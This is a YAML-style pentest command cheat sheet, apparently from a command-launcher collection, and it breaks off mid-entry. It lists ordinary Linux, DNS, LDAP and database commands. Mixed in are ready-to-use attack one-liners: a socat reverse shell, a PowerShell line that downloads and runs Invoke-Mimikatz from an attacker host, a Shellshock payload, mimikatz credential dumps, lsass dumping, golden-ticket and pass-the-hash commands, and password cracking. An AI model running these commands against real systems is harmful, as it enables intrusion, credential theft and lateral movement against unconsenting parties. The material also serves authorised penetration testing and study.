- cmd: egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{128}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{128}' > sha512-hashes.txt
lang: sh
tags: pentest
desc: Extract sha512({128})
- cmd: grep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txt
lang: sh
tags: pentest
desc: Extract valid MySQL-Old hashes
- cmd: grep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txt
lang: sh
tags: pentest
desc: Extract blowfish hashes
- cmd: egrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txt
lang: sh
tags: pentest
desc: Extract Joomla hashes
- cmd: egrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txt
lang: sh
tags: pentest
desc: Extract VBulletin hashes
- cmd: egrep -o '$H$S{31}' *.txt > phpBB3-md5.txt
lang: sh
tags: pentest
desc: Extract phpBB3-MD5
- cmd: egrep -o '$P$S{31}' *.txt > wordpress-md5.txt
lang: sh
tags: pentest
desc: Extract Wordpress-MD5
- cmd: egrep -o '$S$S{52}' *.txt > drupal-7.txt
lang: sh
tags: pentest
desc: Extract Drupal 7
- cmd: egrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txt
lang: sh
tags: pentest
desc: Extract old Unix-md5
- cmd: egrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txt
lang: sh
tags: pentest
desc: Extract md5-apr1
- cmd: egrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt
lang: sh
tags: pentest
desc: Extract sha512crypt, SHA512(Unix)
- cmd: grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" <file>
lang: sh
tags: pentest
desc: Extract emails from file
- cmd: grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" <file>
lang: sh
tags: pentest
desc: Extract valid IP addresses
- cmd: grep -i "pwd\|passw" <file>
lang: sh
tags: pentest
desc: Extract passwords
- cmd: grep -i "user\|invalid\|authentication\|login" <file>
lang: sh
tags: pentest
desc: Extract users
- cmd: grep -i http | grep -shoP 'http.*?[" >]' <file> > http-urls.txt
lang: sh
tags: pentest
desc: Extract HTTP URLS
- cmd: i686-w64-mingw32-gcc <source.c> -lws2_32 -o <output.exe>
lang: sh
tags: compile
desc: compile windows PE 32 executable on linux
- cmd: sudo !!
lang: sh
tags: shell, linux
desc: Re-call last input with sudo
- cmd: help cd / help dir (...)
lang: sh
tags: shell, linux
desc: Help
- cmd: apropos directory / apropos search (...)
lang: sh
tags: shell, linux
desc: Finding Help
- cmd: sudo nano /etc/motd
lang: sh
tags: shell, linux
desc: Define custom startup screen
- cmd: <process> &
lang: sh
tags: shell, linux
desc: Run a script as background process
- cmd: ps -A
lang: sh
tags: shell, linux
desc: List all running processes
- cmd: killall <Process-name>
lang: sh
tags: shell, linux
desc: Kill a running process
- cmd: pwd
lang: sh
tags: shell, linux
desc: Get the current path
- cmd: hostname
lang: sh
tags: shell, linux
desc: Get the current hostname
- cmd: users
lang: sh
tags: shell, linux
desc: Get the current users
- cmd: cal
lang: sh
tags: shell, linux
desc: Show calendar
- cmd: date
lang: sh
tags: shell, linux
desc: Show today's date
- cmd: exit
lang: sh
tags: shell, linux
desc: Exit terminal
- cmd: ps -ef | grep apache | grep -v grep
lang: sh
tags: shell, linux
desc: show process command
- cmd: chgrp <group-name-from> <group-name-to>
lang: sh
tags: shell, linux
desc: Change group
- cmd: ls -Slrh
lang: sh
tags: shell, linux
desc: List directory contents by size
- cmd: ls -altr
lang: sh
tags: shell, linux
desc: List all directory contents sorted by time edited reverse
- cmd: ls *.<txt>
lang: sh
tags: shell, linux
desc: List directory (wildcard matching)
- cmd: find . -name *.<txt> -print
lang: sh
tags: shell, linux
desc: List all files of type
- cmd: cd -
lang: sh
tags: shell, linux
desc: Go back to previous directory
- cmd: mkdir <dirname>
lang: sh
tags: shell, linux
desc: Make (empty) directory
- cmd: rmdir <dirname>
lang: sh
tags: shell, linux
desc: Remove (empty) directory
- cmd: rm -rf <dirname>
lang: sh
tags: shell, linux
desc: Remove directory with all contents without prompt
- cmd: rm -rf *
lang: sh
tags: shell, linux
desc: Remove directory contents and keep directory
- cmd: cd <dirname>
lang: sh
tags: shell, linux
desc: Change directory
- cmd: ln -s <source-dirname> <destination-dirname>
lang: sh
tags: shell, linux
desc: Create symlink
- cmd: ln -sfn <source-dirname> <destination-dirname>
lang: sh
tags: shell, linux
desc: Update symlink
- cmd: unlink <sample-dirname>
lang: sh
tags: shell, linux
desc: Remove symlink
- cmd: touch <filename-txt>
lang: sh
tags: shell, linux
desc: Make (empty) file
- cmd: cp <filename> <file-copyname>
lang: sh
tags: shell, linux
desc: Copy file
- cmd: cp -a <old-folder>/ <new-folder>
lang: sh
tags: shell, linux
desc: Copy/Page folder with content
- cmd: mv <current-filename-path> <new-filename-path>
lang: sh
tags: shell, linux
desc: Move/Rename file
- cmd: mv -i <current-filename> <new-filename>
lang: sh
tags: shell, linux
desc: Move/Rename file and prompt before overwriting an existing file
- cmd: rm <filename-txt>
lang: sh
tags: shell, linux
desc: Remove file
- cmd: cat > <filename-txt>
lang: sh
tags: shell, linux
desc: Write to file (will overwrite existing content)
- cmd: find <filename-txt>
lang: sh
tags: shell, linux
desc: Search for a filename-(not content!) in the current directory
- cmd: grep -r <string> *
lang: sh
tags: shell, linux
desc: Search for a string inside all files in the current directory and subdrectories
- cmd: sed -i s/<original-text>/<new-text>/g <filename-txt>
lang: sh
tags: shell, linux
desc: Search and replace within file
- cmd: md5sum <filename-txt>
lang: sh
tags: shell, linux
desc: MD5 hash for files
- cmd: tar c <folder> | md5sum
lang: sh
tags: shell, linux
desc: MD5 hash for folders
- cmd: openssl enc -aes-256-cbc -e -in <sample-filename-txt> -out <sample-encrypted-txt>
lang: sh
tags: shell, linux
desc: Encrypt file
- cmd: openssl enc -aes-256-cbc -d -in <sample-encrypted> -out <sample-filename>
lang: sh
tags: shell, linux
desc: Decrypt file
- cmd: <username-remote>@<ip>
lang: sh
tags: shell, linux
desc: Access via ssh
- cmd: scp <username-remote>@<ip>:<file-to-send-path> <path-to-recieve>
lang: sh
tags: shell, linux
desc: Copy file from server to local
- cmd: scp <file-to-send> <username-remote>@<ip>:<where-to-put>
lang: sh
tags: shell, linux
desc: Copy file from local to server
- cmd: <path-to-file>\\\ <name-png>
lang: sh
tags: shell, linux
desc: Escape files with spaces in name like this
- cmd: df -h
lang: sh
tags: shell, linux
desc: Show disc space
- cmd: df -i
lang: sh
tags: shell, linux
desc: Show disc space (inodes)
- cmd: du -hs
lang: sh
tags: shell, linux
desc: Show disc space for current directory
- cmd: top or htop
lang: sh
tags: shell, linux
desc: Current processes (also CPS usage)
- cmd: ps aux | grep php
lang: sh
tags: shell, linux
desc: Show running php processes
- cmd: tail error.log -f -n 0
lang: sh
tags: shell, linux
desc: Monitor error log (stream as file grows)
- cmd: xdg-open <programme>
lang: sh
tags: shell, linux
desc: Start application
- cmd: export <TESTING>=<Variable-text>
lang: sh
tags: shell, linux
desc: Register variable
- cmd: echo $<Variable>
lang: sh
tags: shell, linux
desc: Echo variable
- cmd: unset <Variable>
lang: sh
tags: shell, linux
desc: Unset variable
- cmd: echo <Hello> > <hello-txt>
lang: sh
tags: shell, linux
desc: Write to file
- cmd: cat <file1-txt> >> <file2-txt>
lang: sh
tags: shell, linux
desc: Append content from a file to another file
- cmd: cat <file1-txt> | <word-count> | cat > <file2-txt>
lang: sh
tags: shell, linux
desc: Add the amount of lines, words, and characters to file2-txt
- cmd: sort <hello-txt>
lang: sh
tags: shell, linux
desc: Sort the content of a file (like cat)
- cmd: cat <file1-txt> | sort > <sorted-file1-txt>
lang: sh
tags: shell, linux
desc: Save to sorted content to a new file
- cmd: sort <file1-txt> | uniq > <uniq-file1-txt>
lang: sh
tags: shell, linux
desc: Sort and remove duplicates and save to a new file
- cmd: 'curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" <url>'
lang: sh
tags: shell, linux
desc: shellshock
- cmd: echo <content> | curl -F-=\<- qrenco.de
lang: sh
tags: qr code
desc: Create a QR code with some content
- cmd: cat <json_file> | ruby -ryaml -rjson -e 'puts YAML.dump(JSON.load(ARGF))'
lang: sh
tags: json
desc: convert JSON to YAML
- cmd: grep <pattern> <file> | tr '\n' ' '
lang: sh
tags: misc, linux
desc: Convert multi line to one line
- cmd: grep <pattern> <file>.gnmap|cut -d ' ' -f 2 | tr '\n' ' '
lang: sh
tags: misc, linux
desc: grep nmap protocol from file and get ips in one line
- cmd: amap -d <ip> <port>
lang: sh
tags: misc, linux
desc: find service on port
- cmd: sed 's/ 7z/ Android-Debug-Bridge-adb/ apktool/ application-whitelisting/ Arsenal/ AWS/ binwalk/ bloodhound/ bof/ Brew/ C/ certipy/ certutil/ cewl/ chisel/ cme/ coercer/ Compile-windows-PE-32/ Crack-files/ Crontab/ crunch/ cve-bin-tool/ Dirb/ DNS/ Docker/ dotnet-.net/ drupwn/ enum4linux/ eyewitness/ feroxbuster/ ffuf/ flashrom/ FTP/ git/ gobuster/ gowitness/ gpg/ grep/ grep-hash/ gzip/ hashcat/ Hydra/ impacket/ Impacket/ Jadx/ john-the-ripper/ json/ JwtTool/ kerberos/ keytool/ kubernetes/ LAPS/ Lazagne/ ldap/ linux/ linux-bash/ Lsassy/ mimikatz/ mitm6/ MSF/ msfvenom/ msfvenom-create-user/ msfvenom-Handler/ msfvenom-Shellcode/ msssql/ Mysql/ ncat/ netbios/ netcat/ network/ nfs/ nikto/ nmap/ nodejs/ npm/ nvm/ Objection/ openssl/ Others-grep/ php-grep/ pop/ Postgres/ powershell/ powerview/ Printerbug-and-Petitpotam/ procdump/ QR-code/ race-condition/ rar/ rdesktop/ Redis/ responder/ reverse-shell/ rpcclient/ rubeus/ Scripting-Payloads/ SCShell/ Searchsploit/ sed/ server/ Service/ smb/ smbmap/ SMTP/ snmp/ socat/ SQLMAP/ ssh/ systemctl/ tar/ telnet/ Tomcat/ unblob/ veracrypt/ VNC/ WEB/ web-shell/ wfuzz/ wifi/ windows/ windows-rdp/ winrm/ WPSCAN/ X11/ xfreerdp/ ysoserial/ ysoserial.net/ yum/ zip/ /g'
lang: sh
tags: sed
desc: change multiple space to one
- cmd: sed 's/.$//g'
lang: sh
tags: sed
desc: delete the last char
- cmd: veracrypt -t --create <file> --hash sha512 --encryption AES --filesystem ext4 --volume-type normal -k "" --pim 0 --size <size>
lang: sh
tags: veracrypt
desc: Create veracrypt volume for Linux
- cmd: veracrypt <file> <mount>
lang: sh
tags: veracrypt
desc: Open veracrypt volume
- cmd: veracrypt -d <file>
lang: sh
tags: veracrypt
desc: Lock veracrypt volume
- cmd: veracrypt -d
lang: sh
tags: veracrypt
desc: Lock all veracrypt volume
- cmd: sessions -u <session_id>
lang: sh
tags: metasploit
desc: upgrade session to meterpreter
- cmd: sessions -l
lang: sh
tags: metasploit
desc: show session list
- cmd: route print
lang: sh
tags: metasploit
desc: print route table
- cmd: use multi/manage/autoroute
lang: sh
tags: metasploit
desc: add pivot (autoroute)
- cmd: use auxiliary/server/socks_proxy
lang: sh
tags: metasploit
desc: add socks proxy (autoroute first)
- cmd: load incognito
lang: sh
tags: metasploit
desc: load incognito
- cmd: impersonate_token <domain>\\<user>
lang: sh
tags: metasploit
desc: incognito impersonate token
- cmd: execute -H -f <process|notepad>
lang: sh
tags: metasploit
desc: create process
- cmd: migrate -N <process_name|notepad.exe>
lang: sh
tags: metasploit
desc: migrate with name
- cmd: load kiwi; kiwi_cmd "!processprotect /process:lsass.exe /remove"; creds_all
lang: sh
tags: metasploit
desc: PPL remove
- cmd: use post/windows/gather/credentials/enum_laps
lang: sh
tags: metasploit
desc: enum LAPS
- cmd: searchsploit -m <ebdid>
lang: sh
tags: searchsploit, exploit db
desc: searchsploit mirror exploitDB id
- cmd: searchsploit -x <edbid>
lang: sh
tags: searchsploit, exploit db
desc: searchsploit show exploitDB id
- cmd: ./chisel server -v -p <server_port|8000> --reverse
lang: sh
tags: chisel
desc: chisel server (server on local machine)
- cmd: ./chisel client -v <server_ip>:<server_port|8000> R:<serverside-port>:<clientside-host|localhost>:<clientside-port>
lang: sh
tags: chisel
desc: chisel reverse port forwarding (client on remote machine) - forward client port on server
- cmd: ./chisel client -v <server_ip>:<server_port|8000> <clientside-host|0.0.0.0>:<clientside-port>:<serverside-host|127.0.0.1>:<serverside-port>
lang: sh
tags: chisel
desc: chisel remote port forwarding (client on remote machine) - forward server port on client
- cmd: ./chisel client <server_ip>:<server_port> R:socks
lang: sh
tags: chisel
desc: chisel socks proxy (client on remote machine)
- cmd: curl https://ipinfo.io/<ip>
lang: sh
tags: network, ip
desc: ip infos (hostname / city / country / isp )
- cmd: curl https://ipinfo.io/
lang: sh
tags: network, ip
desc: what is my ip
- cmd: curl https://ipecho.net/plain/
lang: sh
tags: network, ip
desc: what is my ip - plaintext
- cmd: curl portquiz.net:<port>
lang: sh
tags: network, ip
desc: test an internet port out allow - curl (no 445)
- cmd: nc -v portquiz.net <port>
lang: sh
tags: network, ip
desc: test an internet port out allow - nc (no 445)
- cmd: ./socat TCP-LISTEN:<port_listener|4444>,fork,reuseaddr TCP-LISTEN:<port_to_forward>
lang: sh
tags: socat
desc: socat port forwarding listener (on local machine)
- cmd: ./socat TCP:<connect_ip>:<connect_port|4444> TCP:127.0.0.1:<port_to_forward>
lang: sh
tags: socat
desc: socat port forwarding connect (on remote machine)
- cmd: ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<listner_ip>:<listner_port|4444>
lang: sh
tags: socat
desc: socat reverse shell (remote victime)
- cmd: socat file:`tty`,raw,echo=0 tcp-listen:<listner_port|4444>
lang: sh
tags: socat
desc: socat reverse shell listener (local)
- cmd: fcrackzip -u -D -p <wordlist> <file>.zip
lang: sh
tags: bruteforce, crack, files
desc: ZIP - fcrackzip
- cmd: zip2john <file>.zip > zip.john; ; john zip.john
lang: sh
tags: bruteforce, crack, files
desc: ZIP - john
- cmd: cat <wordlist> | 7za t <file>.7z
lang: sh
tags: bruteforce, crack, files
desc: 7z - 7za
- cmd: ./7z2john.pl <file>.7z > 7zhash.john; ; john 7zhash.john
lang: sh
tags: bruteforce, crack, files
desc: 7z - john
- cmd: pdfcrack <file>.pdf -w <wordlist>
lang: sh
tags: bruteforce, crack, files
desc: PDF - pdfcrack
- cmd: qpdf --password=<PASSWORD> --decrypt <encrypted_pdf>.pdf <plaintext_pdf>.pdf
lang: sh
tags: bruteforce, crack, files
desc: PDF decrypt - qpdf
- cmd: keepass2john <file>.kdbx > out.kbdx.hashes && john --wordlist <wordlist> out.kbdx.hashes
lang: sh
tags: bruteforce, crack, files
desc: keepass kdbx - john
- cmd: python3 <path_to_john>/run/office2john.py <file>.xls > out.hash && john --wordlist <wordlist> out.hash
lang: sh
tags: bruteforce, crack, files
desc: XLS PPT DOC - john
- cmd: hashcat -a 0 -m 400 hashes <wordlist>
lang: sh
tags: password recovery, password cracking
desc: hashcat - basic md5 (joomla/wordpress) - wordlist
- cmd: hashcat -a 0 -m 400 hashes <wordlist> -r /usr/share/doc/hashcat/rules/best64.rule
lang: sh
tags: password recovery, password cracking
desc: hashcat - basic md5 (joomla/wordpress) - wordlist with rules
- cmd: hashcat -m 13100 --force -a 0 hashes <wordlist>
lang: sh
tags: password recovery, password cracking
desc: hashcat - kerberos ticket (after kerberoasting)
- cmd: hashcat -m 3000 -a 0 hashes <wordlist>
lang: sh
tags: password recovery, password cracking
desc: hashcat - LM
- cmd: hashcat -m 1000 -a 0 hashes <wordlist>
lang: sh
tags: password recovery, password cracking
desc: hashcat - NTLM
- cmd: hashcat -m 5500 -a 0 hashes <wordlist>
lang: sh
tags: password recovery, password cracking
desc: hashcat - NTLMv1
- cmd: hashcat -m 5600 -a 0 hashes <wordlist>
lang: sh
tags: password recovery, password cracking
desc: hashcat - NTLMv2
- cmd: hashcat -m 5600 --force -a 1 hashes <custom_wordlist> <custom_wordlist>
lang: sh
tags: password recovery, password cracking
desc: hashcat - NTLMv2 - Combination attack (ex:passpass,testtest,passtest,etc)
- cmd: cat keywords.txt | hashcat -r <rule_file> --stdout > ./<custom_wordlist>
lang: sh
tags: password recovery, password cracking
desc: hashcat - generate wordlist using rules
- cmd: john --wordlist=<wordlist> --format=lm hash.txt
lang: sh
tags: password recovery, password cracking
desc: john LM
- cmd: john --wordlist=<wordlist> --format=nt hash.txt
lang: sh
tags: password recovery, password cracking
desc: john NTLM
- cmd: john --wordlist=<wordlist> --format=netntlm hash.txt
lang: sh
tags: password recovery, password cracking
desc: john NTLMv1
- cmd: john --wordlist=<wordlist> --format=netntlmv2 hash.txt
lang: sh
tags: password recovery, password cracking
desc: john NTLMv2
- cmd: python /usr/share/john/ssh2john.py <ssh_key> > <ssh_hash|sshkey.hash>
lang: sh
tags: password recovery, password cracking
desc: john ssh convert key
- cmd: john --wordlist=<wordlist> <ssh_hash|sshkey.hash>
lang: sh
tags: password recovery, password cracking
desc: john ssh
- cmd: lazagne.exe all
lang: sh
tags: lazagne, dump password
desc: lazagne dump all passwords (trig av)
- cmd: mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
lang: sh
tags: mimikatz, passwords
desc: mimikatz onliner
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/Invoke-Mimikatz.ps1') | IEX; Invoke mimikatz
lang: ps1
tags: mimikatz, passwords
desc: powershell - load mimikatz
- cmd: mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"
lang: sh
tags: mimikatz, passwords
desc: mimikatz disable PPL and dump passwords
- cmd: mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:<domain> /user:<user>" "exit"
lang: sh
tags: mimikatz, passwords
desc: mimikatz dcsync - user (krbtgt/Administrator)
- cmd: mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
lang: sh
tags: mimikatz, passwords
desc: mimikatz extract credentials from dump
- cmd: mimikatz.exe "lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM"
lang: sh
tags: mimikatz, passwords
desc: mimikatz extract credentials from shadow copy (1)
- cmd: mimikatz.exe "lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY"
lang: sh
tags: mimikatz, passwords
desc: mimikatz extract credentials from shadow copy (2)
- cmd: powershell.exe "[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', '.\Desktop\SYSTEM.bkp'); [System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY', '.\Desktop\SECURITY.bkp'); [System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', '.\Desktop\SAM.bkp')"
lang: sh
tags: mimikatz, passwords
desc: extract on hand shadow volume copy
- cmd: sekurlsa::tickets /export
lang: sh
tags: mimikatz, passwords
desc: mimikatz extract tickets
- cmd: kerberos::golden /user:<user> /domain:<domain> /sid:<child_sid> /krbtgt:<krbtgt_ntlm> /sids:<parent_sid>-519 /ptt
lang: ps1
tags: mimikatz, passwords
desc: mimikatz - forest extra SID
- cmd: sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:"mstsc.exe /restrictedadmin"
lang: sh
tags: mimikatz, passwords
desc: mimikatz pth to RDP mstsc.exe
- cmd: sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm_hash> /run:powershell
lang: sh
tags: mimikatz, passwords
desc: mimikatz pth run powershell remotelly
- cmd: C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
lang: ps1
tags: procdump, lsass, credentials
desc: procdump - dump lsass - local
- cmd: 'net use Z: https://live.sysinternals.com; Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp'
lang: ps1
tags: procdump, lsass, credentials
desc: procdump - dump lsass - remote
- cmd: host -t ns <domain>
lang: sh
tags: dns, host, 53
desc: host find name server
- cmd: host -t mx <domain>
lang: sh
tags: dns, host, 53
desc: host find mail server
- cmd: dig <domain_name> @1.1.1.1
lang: sh
tags: dns, host, 53
desc: dig dns lookup
- cmd: dig ANY <domain_name> @<dns_ip>
lang: sh
tags: dns, host, 53
desc: dig any information
- cmd: dig -x <ip> @<dns_ip>
lang: sh
tags: dns, host, 53
desc: dig reverse lookup
- cmd: dig axfr <domain_name> @<name_server>
lang: sh
tags: dns, host, 53
desc: dig zone transfer
- cmd: dig +short <domain_name> @resolver1.opendns.com
lang: sh
tags: dns, host, 53
desc: dig, find external, public IP address
- cmd: dig -f <domains.txt> +noall +answer
lang: sh
tags: dns, host, 53
desc: dig, find domains file ip address value
- cmd: dig -f <domains.txt> MX +noall +answer
lang: sh
tags: dns, host, 53
desc: dig, find domains file MX ip record
- cmd: dnsrecon -d <domain>
lang: sh
tags: dns, host, 53
desc: dnsrecon standard enum on domain
- cmd: dnsrecon -d <domain> -t axfr
lang: sh
tags: dns, host, 53
desc: dnsrecon zone transfer
- cmd: dnsrecon -r <startip>-<endip> -n <domain_name_server>
lang: sh
tags: dns, host, 53
desc: dnsrecon reverse lookup start/end ip
- cmd: dnsrecon -r <ip_with_network_mask> -n <domain_name_server>
lang: sh
tags: dns, host, 53
desc: dnsrecon reverse lookup network range ip
- cmd: dnsrecon -d <domain> -D <wordlist> -t brt; dnsenum <domain>
lang: sh
tags: dns, host, 53
desc: dnsrecon domain bruteforce
- cmd: nmap -sV -p 53 --script dns-nsid <ip>
lang: sh
tags: dns, host, 53
desc: nmap grab banner
- cmd: nmap -n -sV --script "(*dns* and (default or (discovery and safe))) or dns-random-txid or dns-random-srcport" -p 53 <ip>
lang: sh
tags: dns, host, 53
desc: nmap dns tcp
- cmd: nmap -n -sV -sU --script "(*dns* and (default or (discovery and safe))) or dns-random-txid or dns-random-srcport" -p 53 <ip>
lang: sh
tags: dns, host, 53
desc: nmap dns udp
- cmd: nmap --script dns-srv-enum --script-args dns-srv-enum.domain='<domain>'
lang: sh
tags: dns, host, 53
desc: nmap activedirectory enum
- cmd: nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=<domain> <ip>
lang: sh
tags: dns, host, 53
desc: nmap dnssec
- cmd: msfconsole -x "use auxiliary/gather/enum_dns; set domain <domain>; set ns <dns_server>; exploit"
lang: sh
tags: dns, host, 53
desc: dns metasploit enumeration
- cmd: sublist3r -d <domain> -v
lang: sh
tags: dns, host, 53
desc: dns sublist3r - subdomain enumeration
- cmd: sublist3r -b -d <domain>
lang: sh
tags: dns, host, 53
desc: dns sublist3r - subdomain enumeration with bruteforce module enabled
- cmd: wget -m ftp://anonymous:anonymous@<ip>
lang: sh
tags: ftp, 21
desc: ftp - download all
- cmd: wget -m --no-passive ftp://anonymous:anonymous@<ip>
lang: sh
tags: ftp, 21
desc: ftp download all (2)
- cmd: ftp <ip>
lang: sh
tags: ftp, 21
desc: ftp - connect
- cmd: ftp <ip> <port>
lang: sh
tags: ftp, 21
desc: ftp - connect port
- cmd: nmap -v -p 21 --script=ftp-anon.nse <ip>
lang: sh
tags: ftp, 21
desc: ftp - enum anonym
- cmd: msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS <ip>; set USER_FILE <user_file>; set PASS_FILE <password_file>; exploit"
lang: sh
tags: ftp, 21
desc: ftp - msf bruteforce login
- cmd: nmap -n -sV --script "ldap* and not brute" -p 389 <ip>
lang: sh
tags: pentest
desc: ldap nmap
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -s base
lang: sh
tags: pentest
desc: ldapsearch base
- cmd: ldapsearch -Y GSSAPI -H ldap://<dc_fqdn> -D "<user>" -W -b "dc=<domain>,dc=<path>" "servicePrincipalName=*" servicePrincipalName
lang: sh
tags: pentest
desc: ldapsearch SPN
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -b <basedn>
lang: sh
tags: pentest
desc: ldapsearch with base dn
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>'
lang: sh
tags: pentest
desc: ldapsearch base with authentication
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>' '(&(objectCategory=person)(objectClass=user))'
lang: sh
tags: pentest
desc: ldapsearch - list all users
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>' '(&(objectCategory=user)(adminCount=1))'
lang: sh
tags: pentest
desc: ldapsearch - list all users protected by adminCount
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>' '(&(objectCategory=user)(|(description=*pass*)(description=*password*)(description=*identifiant*)(description=*pwd*)))'
lang: sh
tags: pentest
desc: ldapsearch - list all users with password, pass, identifiant or pwd in their description
- cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>' '(ms-Mcs-AdmPwdExpirationtime=*)' ms-Mcs-AdmPwd
lang: sh
tags: pentest
desc: ldapsearch - list all computer with laps enabled and corresponding laps password if able
- cmd: ldapdomaindump --no-json --no-grep --authtype SIMPLE -o ldap_dump -r <ip> -u <domain>\\<username> -p '<password>'
lang: sh
tags: pentest
desc: ldapdomaindump
- cmd: ldapsearch-ad.py --server '<dc_fqdn>' -d <domain> -u <username> -p <password> --type pass-pols
lang: sh
tags: pentest
desc: ldapsearch-ad - list all password policies including FGPP
- cmd: ldapsearch-ad.py --server '<dc_fqdn>' -d <domain> -u <username> -p <password> -t search -s '(samaccountname=<groupname>)' cn msDS-PSOApplied
lang: sh
tags: pentest
desc: ldapsearch-ad - get the FGPP applied to a group
- cmd: ldapsearch-ad.py --server '<dc_fqdn>' -d <domain> -u <username> -p <password> --type show-user -s '(samaccountname=<username>)'
lang: sh
tags: pentest
desc: ldapsearch-ad - get the FGPP applied to a user
- cmd: sqsh -S <ip> -U <user>
lang: sh
tags: pentest
desc: '- connect'
- cmd: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <ip>
lang: sh
tags: mssql, Microsoft SQL Server, 1433
desc: mssql - enum
- cmd: msfconsole -x "use admin/mssql/mssql_enum_sql_logins; set RHOSTS <ip>; set USER_FILE <user_file>; set PASS_FILE <pass_file>; run"
lang: sh
tags: mssql, Microsoft SQL Server, 1433
desc: mssql - enum sql login
- cmd: msfconsole -x "use auxiliary/admin/mssql/mssql_enum; set RHOST <ip>; set password <password>; run"
lang: sh
tags: mssql, Microsoft SQL Server, 1433
desc: mssql - enum configuration setting (xp-cmdshell)
- cmd: msfconsole -x "use exploit/windows/mssql/mssql_linkcrawler"
lang: sh
tags: mssql, Microsoft SQL Server, 1433
desc: mssql link crawler
- cmd: mysql -u <user> -p<password> -h <hostname> <database>
lang: sh
tags: mysql, database, db, 3306
desc: connect
- cmd: mysql -u <user> -p -e "create database <database> character set UTF8mb4 collate utf8mb4_bin"
lang: sh
tags: mysql, database, db, 3306
desc: Create database
- cmd: mysqldump -u <user> -p <database> > <path>
lang: sh
tags: mysql, database, db, 3306
desc: Export database
- cmd: mysql -u <user> -p <database> <path>
lang: sh
tags: mysql, database, db, 3306
desc: Import database
- cmd: nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <ip>
lang: sh
tags: mysql, database, db, 3306
desc: nmap - mysql enumeration
- cmd: nbtscan -r <ip_range>
lang: sh
tags: netbios, scan, nbtscan
desc: nbtscan - netbios scan
- cmd: showmount -e <ip>
lang: sh
tags: nfs, showmount, 2049
desc: nfs showmount
- cmd: nmap -sV --script=nfs-showmount <ip>
lang: sh
tags: nfs, showmount, 2049
desc: nfs - nmap showmount
- cmd: mount -t nfs <ip>:<shared_folder> <mount_point> -o nolock
lang: sh
tags: nfs, showmount, 2049
desc: nfs - mount
- cmd: mount -t nfs -o vers=2 <ip>:<shared_folder> <mount_point> -o nolock
lang: sh
tags: nfs, showmount, 2049
desc: nfs - mount with v2 (no authenrt=)
- cmd: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port <port> <ip>
lang: sh
tags: pop, pop3, 110, 995
desc: nmap - pop3 infos
- cmd: psql -h <host> -U <user>
lang: sh
tags: postgres, 5432, 5433
desc: postgres - connect
- cmd: psql -h <ip> -U <user> -d <database>
lang: sh
tags: postgres, 5432, 5433
desc: postgres - connect database
- cmd: psql -h <ip> -p <port> -U <user> -W <password> <database>
